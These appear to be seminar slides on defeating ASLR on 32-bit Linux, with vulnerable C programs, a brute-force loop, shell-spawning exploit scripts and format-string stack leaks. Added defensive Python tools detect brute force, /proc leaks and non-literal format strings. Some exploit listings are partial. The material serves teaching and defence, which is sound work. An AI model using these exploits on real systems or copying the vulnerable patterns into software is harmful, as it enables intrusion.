ASLR: Address Space Layout Randomization
Seminar on Advanced Exploitation Techniques
Chair of Computer Science 4, RWTH Aachen
Tilo Müller
Computer Science, Informatik 4, Communication and Distributed Systems

What is ASLR?

A security technology to prevent exploitation of buffer overflows
Most popular alternative: non-executable stack
Enabled by default since Kernel 2.6.12 (2005) / Vista Beta 2 (2006)
Earlier third party implementations: PaX (since 2000)

How does ASLR work?

ASLR = Address Space Layout Randomization
Aim: introduce randomness into the address space of each instantiation (24 bits of a 32-bit address are randomized)
→ Addresses of infiltrated shellcode are not predictable anymore
→ Common exploitation techniques fail, because the place of the shellcode is unknown

[Figure: process memory of two instantiations of the same program; the stack of the 1st instance starts at bfaa2e58 (variables at bfaa2e14, bfaa2e10), the stack of the 2nd instance at bf9114c8 (the same variables at bf911484, bf911480)]

Demonstration: getEBP.c

```c
#include <stdio.h>

/* returns the current frame pointer: the value of EBP is moved into EAX,
   which holds the return value on x86 */
unsigned long getEBP(void) { __asm__("movl %ebp,%eax"); }

int main(void) { printf("EBP: %x\n", getEBP()); }
```

```
$ ./getEBP
EBP: bffff3b8
$ ./getEBP
EBP: bffff3b8      (ASLR disabled: the same address on every run)
$ ./getEBP
EBP: bfaa2e58
$ ./getEBP
EBP: bf9114c8      (ASLR enabled: the stack moves on every run)
```

What is randomized?

Only the stack and the libraries; not, for example, the heap, text, data and bss segments.

Demonstration (two runs of the same command):

```
$ cat /proc/self/maps | egrep '(libc|heap|stack)'
0804d000-0806e000 rw-p 0804d000 00:00 0          [heap]
b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7fa5000-b7fa6000 r--p 00147000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
bfa0d000-bfa22000 rw-p bffeb000 00:00 0          [stack]

$ cat /proc/self/maps | egrep '(libc|heap|stack)'
0804d000-0806e000 rw-p 0804d000 00:00 0          [heap]
b7da0000-b7ee7000 r-xp 00000000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7ee7000-b7ee8000 r--p 00147000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7ee8000-b7eea000 rw-p 00148000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
bfa86000-bfa9b000 rw-p bffeb000 00:00 0          [stack]
```

Overview of ASLR-resistant exploits

1. Brute force
2. Return into non-randomized memory
3. Pointer redirecting
4. Stack divulging methods
5. Stack juggling methods

More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors).

1. Bruteforce

Success of bruteforce is based on:
- the tolerance of an exploit to variations in the address space layout (e.g. how many NOPs can be placed in the buffer)
- how many exploitation attempts can be performed (e.g. it is necessary that a network daemon restarts after a crash)
- how fast the exploitation attempts can be performed (e.g. locally vs. over the network)

Example: vuln.c

```c
#include <string.h>

/* unbounded copy of the first argument into a 4096-byte stack buffer */
void function(char *args) { char buff[4096]; strcpy(buff, args); }

int main(int argc, char *argv[]) { function(argv[1]); return 0; }
```

[Figure: stack layout of one attempt: EBP, RIP = bf...., a 4096-byte buffer filled with NOPs followed by the shell code, ESP; of three guessed return addresses two miss and one hits the NOP sled ("plausible value")]

Chance: 1 to 2^24 / 4096 = 4096 → 2048 attempts on average
Solution: upgrade to a 64-bit architecture

Exemplary bruteforce attack:

```sh
#!/bin/sh
while [ 0 ]; do
    ./vuln `./exploit $i`
    i=$(($i + 2048))
    if [ $i -gt 16777216 ]; then i=0; fi
done
```

It takes about 3 minutes on a 1.5 GHz CPU to get the exploit working:

```
...
Return Address: 0xbfa38901
./bruteforce.sh: line 9: 19081 Segmentation fault
Return Address: 0xbfa39101
sh-3.1$
```

2. Return into non-randomized memory

Exploitation techniques: ret2heap, ret2bss, ret2data, ret2text

- Stack (randomized): parameters and dynamic local variables
- Heap (not randomized): dynamically created data structures (malloc)
- BSS (not randomized): uninitialized global and static local variables
- Data (not randomized): initialized global and static local variables
- Text (not randomized): read-only program code
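The techniques in this section all depend on knowing which mappings stay put between two instantiations. The following script, an added example that is not part of the slides, compares the two /proc/self/maps snapshots shown above (decoded here as constructed sample input) mapping by mapping and reports which bases moved. On a current distribution with PIE binaries and brk randomization the heap and text would move as well, so running it against live snapshots of your own binary is the quickest way to check what your ASLR configuration actually covers.

```python
import re
from typing import Dict, List

# Sample input: the two /proc/self/maps snapshots from the slides, one per run of
# the same process, reduced to the heap, libc and stack lines as the egrep did.
RUN1 = """\
0804d000-0806e000 rw-p 0804d000 00:00 0          [heap]
b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7fa5000-b7fa6000 r--p 00147000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
bfa0d000-bfa22000 rw-p bffeb000 00:00 0          [stack]
"""
RUN2 = """\
0804d000-0806e000 rw-p 0804d000 00:00 0          [heap]
b7da0000-b7ee7000 r-xp 00000000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7ee7000-b7ee8000 r--p 00147000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
b7ee8000-b7eea000 rw-p 00148000 08:01 1971213    /lib/i686/cmov/libc-2.7.so
bfa86000-bfa9b000 rw-p bffeb000 00:00 0          [stack]
"""

# start-end perms offset dev inode [path]; the path is absent for anonymous mappings
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+(\S+)\s+(\d+)\s*(.*)$")


def parse_maps(text: str) -> List[dict]:
    """Parse /proc/<pid>/maps lines into dicts; anonymous mappings get an empty path."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            raise ValueError(f"not a maps line: {line!r}")
        start, end, perms, _offset, _dev, _inode, path = m.groups()
        regions.append({"start": int(start, 16), "end": int(end, 16),
                        "perms": perms, "path": path.strip()})
    return regions


def randomized_regions(run1: str, run2: str) -> List[dict]:
    """Compare two snapshots of the same binary mapping by mapping (same order,
    same filter) and report for each one whether its base moved between runs."""
    a, b = parse_maps(run1), parse_maps(run2)
    if len(a) != len(b):
        raise ValueError("different mapping counts; use the same filter on the same binary")
    report = []
    for r1, r2 in zip(a, b):
        if (r1["path"], r1["perms"]) != (r2["path"], r2["perms"]):
            raise ValueError(f"mapping order differs: {r1['path']!r} vs {r2['path']!r}")
        if r1["end"] - r1["start"] != r2["end"] - r2["start"]:
            raise ValueError(f"size of {r1['path']!r} changed between runs")
        report.append({"region": r1["path"], "perms": r1["perms"],
                       "moved": r1["start"] != r2["start"],
                       "shift": r2["start"] - r1["start"]})
    return report


def moved_regions(run1: str, run2: str) -> List[str]:
    """Names of the regions whose base moved, each listed once, in maps order."""
    seen: Dict[str, None] = {}
    for entry in randomized_regions(run1, run2):
        if entry["moved"]:
            seen.setdefault(entry["region"], None)
    return list(seen)


if __name__ == "__main__":
    for entry in randomized_regions(RUN1, RUN2):
        status = f"moved by {entry['shift']:#x}" if entry["moved"] else "fixed"
        print(f"{entry['region'] or '<anon>':30} {entry['perms']}  {status}")
```

On the slide's data the heap is reported as fixed while libc and the stack move, which is exactly the split the ret2bss/ret2data/ret2heap techniques exploit: a region that is "fixed" in this report is one whose addresses an attacker can hard-code.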
2a. ret2text

The text region is marked read-only → it is only possible to manipulate the program flow (advanced: borrowed code).

Example: vuln.c

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* reachable by every user; overflows a 12-byte buffer */
void public(char *args) { char buff[12]; strcpy(buff, args); printf("public\n"); }

/* only meant to be reached by root */
void secret(void) { printf("secret\n"); }

int main(int argc, char *argv[]) {
    if (getuid() == 0) secret(); else public(argv[1]);
}
```

exploit.sh:

```sh
#!/bin/bash
./vuln `perl -e 'print "A"x16; print "\xfa\x83\x04\x08"'`
```

[Figure: stack: buff = AAAA, SFP = AAAA, RIP = 0x080483fa; text: 0x080483fa: void secret(void)]

2b. ret2bss

```c
#include <string.h>

char globalbuf[256];          /* lives in the bss segment, which is not randomized */

void function(char *input) {
    char localbuf[256];
    strcpy(localbuf, input);      /* overflows the stack buffer */
    strcpy(globalbuf, localbuf);  /* copies the same data to a fixed address */
}

int main(int argc, char **argv) { function(argv[1]); }
```

The bss segment contains the uninitialized global variables: two buffers are needed, one on the stack and one in the bss segment.

[Figure: stack (randomized): local buff = shellcode, SFP = AAAA, RIP = 0x080495e0; bss (not randomized): 0x080495e0: global buff = shellcode]

2c. ret2data / 2d. ret2heap

Similar to ret2bss. Examples of vulnerable code:

Data: initialized global variables

```c
#include <string.h>

char globalbuf[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

void function(char *input) {
    char localbuf[256];
    strcpy(localbuf, input);
    strcpy(globalbuf, localbuf);   /* data segment, not randomized */
}
```

Heap: dynamically created data structures

```c
#include <stdlib.h>
#include <string.h>

void function(char *input) {
    char local_buff[256];
    char *heap_buff;
    strcpy(local_buff, input);
    heap_buff = (char *) malloc(sizeof(local_buff));
    strcpy(heap_buff, local_buff); /* heap, not randomized on this kernel */
}
```
3. Pointer redirecting

Hardcoded strings are saved within non-randomized areas → it is possible to redirect a string pointer to another one. Interesting string pointers are arguments of system, execve, ...

Example: vuln.c

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *args[]) {
    char input[256];
    char *conf = "test -f ~/.progrc";
    char *license = "THIS SOFTWARE IS PROVIDED...\n";
    printf(license);
    strcpy(input, args[1]);          /* overflow reaches the conf pointer */
    if (system(conf)) printf("Error: missing .progrc\n");
}
```

Goal: execute system("THIS SOFTWARE IS...") → system tries to execute THIS → write a script called THIS, e.g.:

```sh
#!/bin/bash
/bin/bash
```

[Figure: stack: input, conf = 0x08048550, license = 0x08048562; data: 0x08048550: "test -f ~/.progrc", 0x08048562: "THIS SOFTWARE IS ..."; system(conf) = system("test -f ~/.progrc")]

[Figure: after the overflow conf = 0x08048562 (input = AAAA...); system(conf) = system("THIS SOFTWARE IS...")]

exploit.sh:

```sh
#!/bin/sh
echo "/bin/sh" > THIS
chmod 777 THIS
PATH=.:$PATH
./vuln `perl -e 'print "A"x256; print "\x62\x85\x04\x08"x2'`
```
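Looking back at section 1: the brute-force loop only works against a service that is restarted after every crash, and every missed guess leaves a kernel segfault message behind. The detector below is an added example, not part of the slides; it parses constructed syslog lines in the shape the x86 kernel prints for a user-space SIGSEGV ("comm[pid]: segfault at ADDR ip IP sp SP error N in FILE[BASE+SIZE]"; all timestamps, pids and addresses are made up) and flags a binary that crashes repeatedly within a short window with a fresh pid and stack pointer each time, which is what repeated guesses against a respawning daemon look like from the host.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List

# Constructed kernel log excerpt: six crashes of "vuln" in under three minutes
# (distinct pids, distinct stack pointers) plus one unrelated crash.
LOG = """\
May  6 00:04:01 host kernel: vuln[19081]: segfault at bfa38901 ip bfa38901 sp bfa37000 error 4 in vuln[8048000+1000]
May  6 00:04:40 host kernel: vuln[19082]: segfault at bfa39101 ip bfa39101 sp bfc11000 error 4 in vuln[8048000+1000]
May  6 00:05:00 host kernel: firefox[2211]: segfault at 0 ip b7d2c0a1 sp bf8f0e30 error 4 in libxul.so[b7a00000+1200000]
May  6 00:05:20 host kernel: vuln[19083]: segfault at bfa39901 ip bfa39901 sp bf9ee000 error 4 in vuln[8048000+1000]
May  6 00:06:00 host kernel: vuln[19084]: segfault at bfa3a101 ip bfa3a101 sp bfd02000 error 4 in vuln[8048000+1000]
May  6 00:06:40 host kernel: vuln[19085]: segfault at bfa3a901 ip bfa3a901 sp bf8a3000 error 4 in vuln[8048000+1000]
May  6 00:07:00 host kernel: vuln[19086]: segfault at bfa3b101 ip bfa3b101 sp bfb77000 error 4 in vuln[8048000+1000]
"""

SEGFAULT_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: (?P<comm>[^\[]+)\[(?P<pid>\d+)\]: "
    r"segfault at (?P<addr>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) "
    r"error (?P<err>\d+)(?: in (?P<obj>\S+))?")


def parse_segfaults(log: str, year: int = 2008) -> List[dict]:
    """Extract segfault events; syslog timestamps carry no year, so one is supplied."""
    events = []
    for line in log.splitlines():
        m = SEGFAULT_LINE.match(line)
        if not m:
            continue                      # not a segfault message, ignore
        stamp = " ".join(m["ts"].split())  # collapse the padded day field
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "comm": m["comm"], "pid": int(m["pid"]),
                       "ip": int(m["ip"], 16), "sp": int(m["sp"], 16),
                       "obj": m["obj"]})
    return events


def detect_bruteforce(events: List[dict], window: timedelta = timedelta(minutes=5),
                      threshold: int = 5) -> List[dict]:
    """One alert per binary that crashed at least `threshold` times inside `window`.
    A sliding window over the time-sorted crashes of each binary is used so that a
    single old crash does not mask a later burst."""
    by_comm = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_comm[e["comm"]].append(e)
    alerts = []
    for comm, evs in by_comm.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                run = evs[start:]          # the burst and everything after it
                alerts.append({"comm": comm, "count": len(run),
                               "distinct_pids": len({e["pid"] for e in run}),
                               "distinct_sp": len({e["sp"] for e in run}),
                               "first": run[0]["ts"], "last": run[-1]["ts"]})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_segfaults(LOG)):
        print(f"{a['comm']}: {a['count']} crashes, {a['distinct_pids']} pids, "
              f"{a['distinct_sp']} stack bases between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

The distinct stack-pointer count is the useful discriminator: a bug that crashes a non-randomized service reproduces at the same sp, whereas a respawned process under ASLR crashes somewhere new each time, so a burst with many distinct sp values for one binary is worth correlating with the service's connection log.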
4. Stack divulging methods

vuln.c (a small network daemon):

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define SA struct sockaddr
int listenfd, connfd;

void function(char *str) {
    char readbuf[256];
    char writebuf[256];
    strcpy(readbuf, str);              /* stack overflow */
    sprintf(writebuf, readbuf);        /* format string vulnerability */
    write(connfd, writebuf, strlen(writebuf));
}

int main(int argc, char *argv[]) {
    char line[1024];
    struct sockaddr_in servaddr;
    ssize_t n;
    listenfd = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servaddr.sin_port = htons(7776);
    bind(listenfd, (SA *)&servaddr, sizeof(servaddr));
    listen(listenfd, 1024);
    for (;;) {
        connfd = accept(listenfd, (SA *)NULL, NULL);
        write(connfd, "$ ", 2);
        n = read(connfd, line, sizeof(line) - 1);
        line[n] = 0;
        function(line);
        close(connfd);
    }
}
```

Goal: discover information about the address space layout
Possibility 1: stack stethoscope (/proc/<pid>/stat)
Possibility 2: format string vulnerabilities

4a. Stack stethoscope

Address of a process stack's bottom: 28th item of /proc/<pid>/stat
The remaining stack can be calculated, since offsets are constant
The stat file is readable by every user per default:

```
$ dir /proc/`pidof vuln`/stat
-r--r--r-- 1 <date> /proc/<pid>/stat
```

Disadvantage: access to the machine is required
Advantage: ASLR is almost useless if one has this access

[Figure: stack bottom ... function main: SFP, RIP, readbuf, writebuf; the offset between the stack bottom and readbuf is constant (bfe14f30 - bfe14858 = 6d8)]

[Figure: stack bottom, function main, SFP, RIP, readbuf, writebuf, shellcode; sb = `cat /proc/`pidof vuln`/stat | awk '{ print $28 }'`, offset = 6d8]

4b. Format strings

In vuln.c above, `sprintf(writebuf, readbuf)` is a format string vulnerability that can be used to receive stack addresses.
Correct: sprintf(writebuf, "%s", readbuf)
Advantage: no access to the machine is required.

[Figure: stack frames of sprintf() and function(): SFP, RIP, the format string "%20$x" ...; bfbf1ec8 is the 20th parameter above the format string; stack bottom; constant offset bfbf2550 - bfbf1ec8 = 688]

→ The stack bottom can be calculated by an exploitation of the format string vulnerability
→ Afterwards the exploit from the stethoscope attack can be used again

Example:

```
$ echo "%20\$x" | nc localhost 7776
$ bfbf1ec8
```
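The stethoscope slide reads field 28 with `awk '{ print $28 }'`, which miscounts as soon as the comm field (field 2, the executable name in parentheses) contains a space. The script below is an added example, not part of the slides: it parses constructed /proc/<pid>/stat lines (pid, comm and all values made up, with the stack bottom set to the slide's bfe14f30) by splitting at the last ')' as proc(5) requires, and reports whether the file discloses the stack bottom at all. Current Linux kernels report 0 in fields 28-30 (startstack, kstkesp, kstkeip) unless the reader has ptrace access to the process, so the same check doubles as an audit of whether a given kernel still leaks this value to unprivileged users.

```python
from typing import List

# Constructed stat line: the comm field deliberately contains a space to exercise the
# parser; field 28 (startstack) is 3219214128 == 0xbfe14f30, the slide's stack bottom.
STAT_LEAK = ("19081 (vuln daemon) S 1 19081 19081 0 -1 4194560 70 0 0 0 0 0 0 0 20 0 1 0 "
             "12345 2174976 120 4294967295 134512640 134514000 "
             "3219214128 3219213000 134513424 0 0 0 0 0 0 0 17 0 0 0 0 0 0")

# Same process as a kernel that hides startstack/kstkesp/kstkeip from this reader would show it.
STAT_HIDDEN = ("19081 (vuln daemon) S 1 19081 19081 0 -1 4194560 70 0 0 0 0 0 0 0 20 0 1 0 "
               "12345 2174976 120 4294967295 134512640 134514000 "
               "0 0 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0")

STARTSTACK_FIELD = 28   # 1-based numbering as in proc(5)


def parse_stat(line: str) -> List[str]:
    """Split a /proc/<pid>/stat line into fields, index 0 == field 1 of proc(5).
    comm may contain spaces and parentheses, so the split happens at the LAST ')'."""
    lpar = line.index("(")
    rpar = line.rindex(")")
    pid = line[:lpar].strip()
    comm = line[lpar + 1:rpar]
    rest = line[rpar + 1:].split()
    return [pid, comm] + rest


def field(line: str, number: int) -> str:
    """Return field `number` (1-based, proc(5) numbering)."""
    fields = parse_stat(line)
    if not 1 <= number <= len(fields):
        raise ValueError(f"stat line has only {len(fields)} fields, no field {number}")
    return fields[number - 1]


def startstack(line: str) -> int:
    """The kernel's idea of the stack bottom for this process (0 when withheld)."""
    return int(field(line, STARTSTACK_FIELD))


def stack_base_disclosed(line: str) -> bool:
    """True when the stat file reveals the stack bottom, i.e. the stethoscope works."""
    return startstack(line) != 0


if __name__ == "__main__":
    for name, sample in (("leaking kernel", STAT_LEAK), ("hiding kernel", STAT_HIDDEN)):
        print(f"{name}: comm={field(sample, 2)!r} startstack={startstack(sample):#x} "
              f"disclosed={stack_base_disclosed(sample)}")
```

Pointing `stack_base_disclosed` at `open(f"/proc/{pid}/stat").read()` for a process owned by another user tells you whether the stethoscope approach is still viable on the machine being hardened; if it is, the usual remedies are mounting /proc with `hidepid` or restricting ptrace access rather than relying on ASLR alone.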
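The correct call on the slide, `sprintf(writebuf, "%s", readbuf)`, differs from the vulnerable one only in whether the format argument is a literal, which makes the defect easy to spot mechanically. The checker below is an added example, not part of the slides: it scans constructed C source lines (including the daemon's own `sprintf` line) for printf-family calls whose format argument is not a string literal, splitting arguments at top-level commas so nested calls and quoted commas do not confuse it. GCC performs the same check with `-Wformat -Wformat-security`; this version is for source you cannot compile in place, such as a code review diff.

```python
import re
from typing import List, Tuple

# Constructed C fragment: line 2 is the slide's vulnerable call, line 3 the corrected one.
SAMPLE_SOURCE = """\
    strcpy(readbuf, str);
    sprintf(writebuf, readbuf);                 /* user data used as format string */
    sprintf(writebuf, "%s", readbuf);           /* correct */
    printf(license);                            /* fixed string, but still not a literal */
    fprintf(stderr, "%s, %s\\n", f(a, b), msg);
    snprintf(out, sizeof out, fmt_from_user);
"""

# position (0-based) of the format argument for each function we check
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "dprintf": 1, "sprintf": 1,
                    "snprintf": 2, "syslog": 1}
CALL = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")


def split_args(text: str) -> List[str]:
    """Split the text after a call's '(' at top-level commas, honouring nested
    parentheses and double-quoted strings; stops at the matching ')'."""
    args, cur, depth, in_str, i = [], [], 0, False, 0
    while i < len(text):
        c = text[i]
        if in_str:
            cur.append(c)
            if c == "\\" and i + 1 < len(text):   # keep escaped char, e.g. \"
                cur.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c == "(":
            depth += 1
            cur.append(c)
        elif c == ")":
            if depth == 0:
                args.append("".join(cur).strip())
                return args
            depth -= 1
            cur.append(c)
        elif c == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    args.append("".join(cur).strip())            # unterminated call on this line
    return args


def find_format_string_issues(source: str) -> List[Tuple[int, str, str]]:
    """(line number, function, format argument) for every call whose format
    argument is not a string literal."""
    issues = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CALL.finditer(line):
            args = split_args(line[m.end():])
            idx = FORMAT_ARG_INDEX[m.group(1)]
            if idx >= len(args):
                continue                          # too few arguments to judge
            fmt = args[idx]
            if not (len(fmt) >= 2 and fmt.startswith('"') and fmt.endswith('"')):
                issues.append((lineno, m.group(1), fmt))
    return issues


if __name__ == "__main__":
    for lineno, func, fmt in find_format_string_issues(SAMPLE_SOURCE):
        print(f"line {lineno}: {func}() called with non-literal format {fmt!r}")
```

`printf(license)` on line 4 is flagged as well even though `license` is a constant: as section 3 showed, a pointer to a hard-coded string can itself be redirected, so the literal-format rule is worth applying without exceptions.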
5. Stack juggling methods

Based on a pointer that is a potential pointer to the shellcode.

[Figure: stack: SFP, RIP, buff, pointer ...]

5a. ret2ret

A potential pointer points to the shellcode if its least significant byte is overwritten by zero (string termination). But how to use this aligned pointer as return instruction pointer?

[Figure: stack: pointer\x00, buff = NOPs + shellcode]

Solution: chain of ret's. ret can be found in the text segment (which is not randomized).

[Figure: stack: buff = NOPs + shellcode, SFP, RIP = &ret, &ret, ..., pointer\x00]

Function epilogue of b():

```
leave = movl %ebp,%esp
        popl %ebp
ret   = popl %eip
```

[Animation over several slides: ESP, EIP and EBP while the epilogue of b() returns into the ret chain; each ret pops the next &ret, until the aligned pointer\x00 is popped into EIP and execution lands in the NOP sled in buff]

exploit.c (only the parts shown on the slide):

```c
#include <stdio.h>

#define RET 0x0804840f

int main(void) {
    char *buff, *ptr;
    long *adr_ptr;
    int buf_size = 280;
    int ret_size = 20;
    ...
    buff[buf_size] = '\0';
    printf("%s", buff);
    return 0;
}
```

vuln.c:

```c
#include <string.h>

void function(char *overflow) { char buffer[256]; strcpy(buffer, overflow); }

int main(int argc, char **argv) {
    int no = 1;
    int *ptr = &no;        /* a potential pointer next to the overflowed frame */
    function(argv[1]);
    return 1;
}
```

5b. ret2pop

After strcpy the shellcode is stored redundantly in memory. Idea: use a perfect pointer to the shellcode placed in argv.

[Figure: stack: SFP, RIP, buff, pointer, argv → shellcode; EIP = ?]

Problem: avoid overwriting the least significant byte of the perfect pointer by zero.

[Figure: stack: SFP, RIP, buff, pointer\x00, argv → shellcode]

Solution: a ret-chain followed by pop;ret. The pop instruction skips over the memory location which is overwritten by zero.

[Figure: stack: buff, &ret, ..., &pop;ret, pointer\x00, argv → shellcode]

exploit.c (only the parts shown on the slide):

```c
#include <stdio.h>
#include <string.h>

#define POPRET 0x0804846
#define RET 0x08048468

int main(void) {
    char *buff, *ptr;
    long *adr_ptr;
    int i;
    ...
    buff[264 + strlen(shellcode)] = '\0';
    printf("%s", buff);
    return 0;
}
```

5c. ret2esp

vuln.c:

```c
#include <string.h>

void function(char *str) { char buf[256]; strcpy(buf, str); }

int main(int argc, char **argv) {
    int x = 58623;
    function(argv[1]);
    return 1;
}
```

5d. ret2eax

Return values are stored in EAX.
→ EAX could contain a perfect shellcode pointer after a function returns a pointer to user input.
→ Overwrite RIP by a pointer to a `call *%eax` instruction.

Example: strcpy(buf, str) returns a pointer to buf, i.e. bufptr = strcpy(buf, str) causes EAX and bufptr to point to the same location as buf.

vuln.c:

```c
#include <string.h>

void function(char *str) { char buf[256]; strcpy(buf, str); }

int main(int argc, char **argv) { function(argv[1]); return 1; }
```

[Animation over several slides: EBP, ESP and EAX during main() → function() → strcpy(); after strcpy() returns, EAX points to buf (the shellcode); the overflowed RIP of function() is &call *%eax, so its epilogue (leave = movl %ebp,%esp; popl %ebp / ret = popl %eip) transfers control to call *%eax, and EIP then points into buf]

exploit.c (the slide breaks off here; the last two digits of the address are illegible in the source):

```c
#define CALLEAX 0x080484??

int main(void) {
    char *buff, *ptr;
    long *adr_ptr;
```